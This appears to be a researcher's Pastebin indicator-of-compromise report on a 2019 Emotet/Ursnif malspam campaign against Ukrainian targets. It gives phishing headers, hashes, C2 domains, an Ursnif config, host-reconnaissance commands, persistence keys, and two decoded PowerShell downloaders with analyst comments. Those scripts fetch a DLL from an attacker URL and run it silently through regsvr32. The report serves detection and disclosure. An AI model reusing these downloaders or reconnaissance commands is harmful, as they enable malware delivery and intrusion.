
#emotet_ursnif_171019

VRad Oct 18th, 2019 (edited) 405 Never
  1. #IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject
  2.  
  3. https://pastebin.com/1XfkVE5e
  4.  
  5. previous_contact: n/a
  6.  
  7. FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/
  8.  
  9. attack_vector
  10. --------------
  11. email attachment .DOC > macro > base64 > powershell > GET bin > %user%\*.bin > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll
  12.  
  13. email_headers
  14. --------------
  15. #1
  16. Return-Path: <noreply@princefinance.princefamily33.com>
  17. Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
  18. Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
  19. Received: from box5254.bluehost.com ([162.241.225.96])
  20. Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
  21. Subject: терміново
  22. From: "Tetyana.Olekseevna@monolit.dn.ua" <noreply@princefinance.princefamily33.com>
  23. Date: Thu, 17 Oct 2019 16:35:57 +0300
  24. X-Source-IP: 89.253.149.192
  25. X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
  26. X-Source-Auth: noreply@princefinance.princefamily33.com
  27.  
  28. #2
  29. Return-Path: <christina@princeonlinewebdesign.com>
  30. Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
  31. Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
  32. Received: from box5254.bluehost.com ([162.241.225.96])
  33. Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
  34. Date: Thu, 17 Oct 2019 16:35:57 +0300
  35. From: "Zoryana.Volodimirovna@topyachts.com.ua" <christina@princeonlinewebdesign.com>
  36. Subject: Рахунок-Фактура №340
  37. X-Source-IP: 178.75.241.39
  38. X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
  39. X-Source-Auth: christina@princeonlinewebdesign.com
  40.  
  41. #3
  42. Return-Path: <betty@upstatehealthcareservices.com>
  43. Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
  44. Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
  45. Received: from box787.bluehost.com ([66.147.244.87])
  46. Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
  47. From: "Ivan.Volodimirovich@scalehobby.com.ua" <betty@upstatehealthcareservices.com>
  48. Date: Thu, 17 Oct 2019 16:22:40 +0300
  49. Subject: Рахунок за Газ №9282
  50. X-Source-IP: 62.176.68.133
  51. X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
  52. X-Source-Auth: betty@upstatehealthcareservices.com
  53.  
  54. files
  55. --------------
  56. SHA-256     f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
  57. File name   rahunok#0027980.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  58. File size   285 KB (291840 bytes)
  59.  
  60. SHA-256     3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
  61. File name   rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  62. File size   329.5 KB (337408 bytes)
  63.  
  64. SHA-256     e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
  65. File name   hfsjaoipqewfbwoei.bin (point.dll)   [PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
  66. File size   1.1 MB (1150976 bytes)
  67.  
  68. activity
  69. **************
  70. PL_SCR          161.117.39.210      limitsno{.} at/hfsjaoipqewfbwoei.bin
  71.  
  72. C2          47.74.186.51        vip-statistic{.} at
  73.  
  74. + @bomccss
  75. #ursnif config
  76. serpent_key: Dfei8OoQ0xhjTyql
  77. botnet-id: 700
  78. version: 217027
  79.  
  80. c2:
  81. cxzko43pnr7ujnte[.]onion
  82. vip-statistic[.]at
  83. intrade-support[.]at
  84. fresh-girls[.]at
  85.  
  86.  
  87. netwrk
  88. --------------
  89. [ssl]
  90. 216.58.201.78   google.com      Client Hello
  91.  
  92. [http]
  93. 47.74.186.51        limitsno{.} at      GET /hfsjaoipqewfbwoei.bin          HTTP/1.1    noUA   
  94. 47.74.186.51        vip-statistic{.} at GET /images/NFVfNmnFntzllAW_2/..../P1.gif   HTTP/1.1    Mozilla/4.0
  95. 47.74.186.51        vip-statistic{.} at POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp     HTTP/1.1    Mozilla/4.0
  96.  
  97. comp
  98. --------------
  99. powershell.exe  2832    TCP localhost   49168   47.74.186.51    80  ESTABLISHED
  100. explorer.exe    1988    TCP localhost   49169   216.58.201.78   443 ESTABLISHED
  101. explorer.exe    1988    TCP localhost   49170   216.58.201.68   443 ESTABLISHED
  102. explorer.exe    1988    TCP localhost   49171   47.74.186.51    80  ESTABLISHED
  103. explorer.exe    1988    TCP localhost   49172   5.61.57.146 80  ESTABLISHED
  104.  
  105. proc
  106. --------------
  107. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  108. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
  109. "C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
  110. C:\Windows\system32\control.exe /?
  111. "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?
  112.  
  113. C:\Windows\system32\cmd.exe
  114. cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
  115. cmd /C "echo -------- >> C:\tmp\415B.bi1"
  116. "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  117.  
  118. cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
  119. C:\Windows\system32\systeminfo.exe
  120.  
  121. cmd /C "net view >> C:\tmp\A13.bin1"
  122. C:\Windows\system32\net.exe net  view
  123.  
  124. cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
  125. cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"
  126.  
  127. cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
  128. cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"
  129.  
  130. persist
  131. --------------
  132. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              18.10.2019 14:07   
  133.  
  134. crypssec    Free Age    SportsSignup Meat  
  135. c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll   06.10.2019 13:51   
  136.  
  137. @rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer
  138.  
  139. drop
  140. --------------
  141. C:\Users\operator\nKUXcZ.bin
  142. C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
  143. C:\tmp\A13.bin1     - zip archive of the collected host info (see proc) !!!
  144. C:\tmp\415B.bi1     - zip archive of the collected host info (see proc) !!!
  145. C:\tmp\D5D9.bin     - zip archive of collected host info !!!
  146. C:\tmp\422B.bin     - zip archive of collected host info !!!
  147. C:\tmp\2BF9.bin     - zip archive of collected host info !!!
  148. C:\tmp\4DC3.bin     - zip archive of collected host info !!!
  149. C:\tmp\3083.bin     - zip archive of collected host info !!!
  150.  
  151. decoded base64 > powershell
  152. --------------
  153. #1
  # Analyst annotation (comments only, script text unchanged): stage-2 downloader recovered from the
  # base64 handed to powershell.exe -enco (see proc). Flow: build %USERPROFILE%\nKUXcZ.bin ->
  # WebClient.DownloadFile from limitsno{.}at -> if the file is >= 200000 bytes, hand it to
  # regsvr32.exe /s -> otherwise (or on any exception) call itself again with no retry cap.
  # Every variable holding a random lowercase string is assigned once and never read:
  # dead-store padding, presumably to vary each sample's hash.
  154. $yozninjdjc="wxvhw";
  155. $kjqpsfw = "nKUXcZ";   # file stem of the dropped payload; matches drop: C:\Users\operator\nKUXcZ.bin
  156. $kyvisokdvpou="iisvbivwcdfv";
  157. $bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";   # drop path is the user profile root, not a temp dir
  158. $shofvhgo="hfaho";
  159. $rwwci=&("new-object") net.webclient;   # New-Object invoked through &("...") (cmdlet name as a string); no headers are set on the client, consistent with "noUA" in netwrk
  160. $mznbayyscbf="clmvzpwymfxtqyuuq";
  161. $mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";   # payload URL (defanged by the author); PL_SCR entry in activity
  162. $hxpdmkdtmrg="kclcrunb";
  163. Function dwnld{   # download-and-run routine; recursive on every failure path (see below)
  164. $ndrrgwesufj="bqdtsgtsy";
  165. try{
  166. $ubjlvybhksmvmqz="svebvywesqwpbtt";
  167. $rwwci."DownloadFile"($mtfyqp, $bduhtq);   # method name given as a string literal, same obfuscation idea as line 159
  168. $nosvyxzfejquwqm="jaqaiyxlv";
  169. If ((.("Get-Item") $bduhtq)."length" -ge 200000) {   # size gate; likely meant to reject short bodies (error pages, sinkholes) - the real DLL is 1150976 bytes (files section)
  170. $pnpeirog="kmcyuo";
  171. $ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;   # .bin is loaded as a DLL and its DllRegisterServer runs silently; the process object is never used. Detection: regsvr32 spawned by powershell on a %USERPROFILE%\*.bin path
  172. $ksecir="jvnvnwurbfdxqygqf";
  173. } else {
  174. $mhmwvmqfuybxwur="drffczm";
  175. dwnld;   # undersized download: recurse immediately, no delay and no cap, until a large enough body arrives or PowerShell's call-depth limit is hit
  176. $pemmvoigqmsza="jyeqziuppapb";
  177. }
  178. $cqhccbph="gvuz";
  179. }catch{
  180. $rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";
  181. dwnld;   # any exception (DNS failure, HTTP error, file locked) also recurses unboundedly - this is the repeated GET seen in netwrk
  182. $vwdggtfwd="ovjvyghtjfxrnktgt";
  183. }}dwnld;   # entry call
  184. $zbadv="vccbbnzdpdyqgcv";
  185.  
  186. #2
  # Analyst annotation (comments only, script text unchanged): second decoded stage, same logic as
  # the first with renamed variables and a different file stem (UJqEF). Downloads the same
  # limitsno{.}at payload to %USERPROFILE%\UJqEF.bin, runs it via regsvr32.exe /s once it is
  # at least 200000 bytes, and retries by unbounded recursion on any shorter file or exception.
  # All random-lowercase-string variables are write-only padding.
  187. $zhsiziqtdjjsyfye="nxoyyqtocw";
  188. $mgvtio = "UJqEF";   # file stem for this sample's drop (not listed in the drop section, which was taken from the other document)
  189. $ithgawkqu="wgpqgqgnhjruhliad";
  190. $yueeoa=$env:userprofile+"\"+$mgvtio+".bin";   # %USERPROFILE%\UJqEF.bin
  191. $izbblp="zlzhdcptbhaunoglez";
  192. $ngvqvqb=&("new-object") net.webclient;   # cmdlet name passed as a string through the call operator; no headers set on the client
  193. $kltkpujnqzfofb="dzygqluhywhhvtx";
  194. $nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";   # same payload URL as the first decoded script (defanged by the author)
  195. $rbntzlbqkulv="vvrfbdvtoo";
  196. Function dwnld{
  197. $lazaxcmudbef="wzgiffoctszol";
  198. try{
  199. $wrqkxxidhtjrrcq="bviazvtzbmwpoiz";
  200. $ngvqvqb."DownloadFile"($nslldzj, $yueeoa);   # WebClient.DownloadFile with the method name as a string literal
  201. $wurllwckcoaobk="cwnwbf";
  202. If ((.("Get-Item") $yueeoa)."length" -ge 200000) {   # size gate before execution; Get-Item is dot-sourced from a string
  203. $quyqejvsjujj="mzoffmbtc";
  204. $jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;   # silent DllRegisterServer of the dropped .bin; returned process object unused
  205. $gzvivurflv="koherilwrbkvczpi";
  206. } else {
  207. $ypcmgzp="zkupghelnqeegzm";
  208. dwnld;   # too small: recurse with no cap or back-off
  209. $zgxifpixbe="bwoffieyelusq";
  210. }
  211. $jbialh="huodfndgmg";
  212. }catch{
  213. $yjkwithuhhapy="ilcdki";
  214. dwnld;   # any exception: recurse again, no cap
  215. $xlgnju="gpstdwckvbm";
  216. }}dwnld;   # entry call
  217. $gxpfk="ehxqxmwggmw";
  218.  
  219.  
  220. # # #
  221. https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
  222. https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
  223. https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
  224. https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1
  225.  
  226.  
  227. VR
  228.  
  229. @